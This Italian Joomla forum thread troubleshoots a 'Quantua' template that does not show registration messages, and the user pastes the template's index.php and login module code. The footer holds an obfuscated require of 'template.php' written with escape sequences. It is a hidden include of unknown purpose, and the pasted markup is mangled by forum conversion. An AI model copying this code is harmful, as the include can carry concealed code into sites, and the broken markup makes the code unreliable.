Joomla.it Forum
Joomla! 2.5 (versione con supporto terminato) => Joomla! 1.6/1.7/2.5 => I Template di Joomla 1.6/1.7/2.5 => : marlin 03 Nov 2013, 18:13:00
-
il templete quantua non mi carica la pagina di avvenuta registrazione o di errore come posso risolvere questo problema?
vi ringrazio anticipatamente del vostro aiuto!
Salvo
-
le impostazioni SEO come sono impostate?
-
È un template commerciale? Non ho trovato nessun template con questo nome.
-
le impostazioni SEO come sono impostate?
non è una questione di seo è proprio che manca qualcosa nel codice
-
È un template commerciale? Non ho trovato nessun template con questo nome.
tom ci sono due versioni una free è una a pagamento
-
Questo errore è tipico di quando nel template manca l'inclusione della visualizzazione dei messaggi.
-
non è una questione di seo è proprio che manca qualcosa nel codice
puo darsi, ma visto che sai di cosa parlo, una verfica non guasterebbe, anche perchè senza link al sito possiamo solo provare a fare ipotesi.
-
puo darsi, ma visto che sai di cosa parlo, una verfica non guasterebbe, anche perchè senza link al sito possiamo solo provare a fare ipotesi.
www.burgman.it spero ci capiate qualcosa
:D
-
hai il seo attivato a metà, disattivalo completamente e riprova a fare una nuova registrazione
-
disattivato ma non succede nulla, invia la registrazione ma non non compare la pagina
-
Questo errore è tipico di quando nel template manca l'inclusione della visualizzazione dei messaggi.
Hai verificato se manca?
-
si manca nel default css e nella index php e nel default php . ci capisco poco vado a tentoni :D
-
nel file index.php del tuo template, questo:
<jdoc:include type="message" />
-
index.php
<?php
/****************************************************
#####################################################
##-------------------------------------------------##
## QUANTUA ##
##-------------------------------------------------##
## Copyright = globbersthemes.com- 2013 ##
## Date = MAI 2013 #
## Author = globbers ##
## Websites = http://www.globbersthemes.com ##
## ##
#####################################################
****************************************************/
// no direct access
defined('_JEXEC') or die('Restricted access');
/* The following line loads the MooTools JavaScript Library */
JHtml::_('behavior.framework', true);
/* The following line gets the application object for things like displaying the site name */
$app = JFactory::getApplication();
$csite_name = $app->getCfg('sitename');
$path = $this->baseurl.'/templates/'.$this->template;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<?php #main width#
$mod_left = $this->countModules( 'position-7' );
if ( $mod_left ) { $width = '';
} else { $width = '-full';}
?>
<?php
$image1 = htmlspecialchars($this->params->get('image1'));
$image2 = htmlspecialchars($this->params->get('image2'));
$image3 = htmlspecialchars($this->params->get('image3'));
$bodybackground = htmlspecialchars($this->params->get('bodybackground'));
$logo = htmlspecialchars($this->params->get('logo'));
?>
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/defaut.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/box.css" type="text/css" />
<?php if ($this->direction == 'rtl') : ?>
<?php endif; ?>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/mootools.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/script.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/jquery.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/nivo.slider.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/superfish.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/js/hover.js"></script>
<link href='http://fonts.googleapis.com/css?family=Oswald:100,300,400,700,900,100italic,300italic,400italic,700italic,900italic' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Open+Sans:100,300,400,700,900,100italic,300italic,400italic,700italic,900italic' rel='stylesheet' type='text/css'>
<script type="text/javascript">
window.addEvent('domready', function() {
SqueezeBox.initialize({});
$$('a.modal').each(function(el) {
el.addEvent('click', function(e) {
new Event(e).stop(); SqueezeBox.fromElement(el);
}); }); });
</script>
<script type="text/javascript">
var $j = jQuery.noConflict();
$j(document).ready(function() {
$j('.navigation ul').superfish({
delay: 800,
animation: {opacity:'show',height:'show'},
speed: 'normal',
autoArrows: false,
dropShadows: true
}); });
</script>
<script type="text/javascript">
var $j = jQuery.noConflict();
jQuery(document).ready(function ($){
$j("#slider").nivoSlider(
{
effect: 'sliceUpDown',//sliceUpDown
slices: 15,
boxCols: 8,
boxRows: 4,
animSpeed: 1200,
pauseTime: 6000,
startSlide: 0,
directionNav: true,
directionNavHide: true,
controlNav: true,
controlNavThumbs: true,
pauseOnHover: true,
manualAdvance: false,
prevText: 'Prev',
nextText: 'Next',
randomStart: false,
beforeChange: function(){},
afterChange: function(){},
slideshowEnd: function(){},
lastSlide: function(){},
afterLoad: function(){}
}); });
</script>
<style type="text/css">
body {
background:url('<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($bodybackground); ?>') repeat 0 0;
}
</style>
<?php if($this->direction == 'rtl') : ?>
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/default.css" type="text/css" />
<?php endif; ?>
</head>
<body>
<div id="wrapper-slide">
<div id="slide">
<div id="slider" class="nivoSlider">
<img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($image1); ?>" alt="image1" />
<img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($image2); ?>" alt="image2" />
<img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($image3); ?>" alt="image3" />
<>
<>
<>
<div class="pagewidth">
<div id="sitename">
<a href="index.php"><img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($logo); ?>" alt="logo" width="440" height="197" alt="logotype" />[/url]
<>
<div id="menu">
<div class="navigation">
<jdoc:include type="modules" name="position-1" />
<>
<?php if ($this->countModules('position-0')) { ?>
<div id="toolitem">
<div id="search">
<div class="text-search">
<a href="#helpdiv2" class="modal" style="cursor:pointer" title="search" rel="{size: {x: 206, y: 285}, ajaxOptions: {method: "get"}}">
search
[/url]
<>
<>
<div style="display:none;">
<div id="helpdiv2" >
<jdoc:include type="modules" name="position-0" style="xhtml" />
<>
<>
<>
<?php } ?>
<>
<>
<div id="sep"><>
<div class="pagewidth">
<div id="content-main">
<div id="main<?php echo $width ?>">
<jdoc:include type="component" />
<>
<?php if ($this->countModules('position-7')) { ?>
<div id="right">
<jdoc:include type="modules" name="position-7" style="xhtml" />
<>
<?php } ?>
<>
<?php if ($this->countModules('position-3') || $this->countModules('position-4') || $this->countModules('position-6') ||$this->countModules('position-8')) { ?>
<div class="pagewidth">
<div id="wrapper-box">
<div class="box">
<jdoc:include type="modules" name="position-3" style="xhtml" />
<>
<div class="box">
<jdoc:include type="modules" name="position-4" style="xhtml" />
<>
<div class="box">
<jdoc:include type="modules" name="position-6" style="xhtml" />
<>
<div class="box">
<jdoc:include type="modules" name="position-8" style="xhtml" />
<>
<>
<>
<?php } ?>
<div class="ftb">
<div class="ftb-c">
<?php echo date( 'Y' ); ?> <?php echo $csite_name; ?>
<?php require("te\x6d\160la\164e.\160\150\160"); ?>
<>
<div id="top">
<div class="top_button">
<a href="#" onclick="scrollToTop();return false;">
<img src="templates/<?php echo $this->template ?>/images/top.png" width="30" height="30" alt="top" />[/url]
<>
<>
<>
<>
?>
<jdoc:include type="message" />
<jdoc:include type="component" />
</body>
</html>
-
scusate ho sbagliato la default.php il codice è questo
<?php
/**
* @version $Id: default.php 21322 2011-05-11 01:10:29Z dextercowley $
* @package Joomla.Site
* @subpackage mod_login
* @copyright Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
// no direct access
defined('_JEXEC') or die;
JHtml::_('behavior.keepalive');
?>
<?php if ($type == 'logout') : ?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form">
<?php if ($params->get('greeting')) : ?>
<div class="login-greeting">
<?php if($params->get('name') == 0) : {
echo JText::sprintf('MOD_LOGIN_HINAME', $user->get('name'));
} else : {
echo JText::sprintf('MOD_LOGIN_HINAME', $user->get('username'));
} endif; ?>
<>
<?php endif; ?>
<div class="logout-button">
<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGOUT'); ?>" />
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.logout" />
<input type="hidden" name="return" value="<?php echo $return; ?>" />
<?php echo JHtml::_('form.token'); ?>
<>
</form>
<?php else : ?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form" >
<?php if ($params->get('pretext')): ?>
<div class="pretext">
<p><?php echo $params->get('pretext'); ?></p>
<>
<?php endif; ?>
<fieldset class="userdata">
<p id="form-login-username">
<label for="modlgn-username"><?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?></label>
<input id="modlgn-username" type="text" name="username" class="inputbox" size="18" />
</p>
<p id="form-login-password">
<label for="modlgn-passwd"><?php echo JText::_('JGLOBAL_PASSWORD') ?></label>
<input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
</p>
<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
<p id="form-login-remember">
<label for="modlgn-remember"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label>
<input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
</p>
<?php endif; ?>
<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGIN') ?>" />
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return" value="<?php echo $return; ?>" />
<?php echo JHtml::_('form.token'); ?>
</fieldset>
<ul>
<li>
<a href="<?php echo JRoute::_('index.php?option=com_users&view=reset'); ?>">
<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_PASSWORD'); ?>[/url]
</li>
<li>
<a href="<?php echo JRoute::_('index.php?option=com_users&view=remind'); ?>">
<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_USERNAME'); ?>[/url]
</li>
<?php
$usersConfig = JComponentHelper::getParams('com_users');
if ($usersConfig->get('allowUserRegistration')) : ?>
<li>
<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration'); ?>">
<?php echo JText::_('MOD_LOGIN_REGISTER'); ?>[/url]
</li>
<?php endif; ?>
</ul>
<?php if ($params->get('posttext')): ?>
<div class="posttext">
<p><?php echo $params->get('posttext'); ?></p>
<>
<?php endif; ?>
</form>
<?php endif; ?>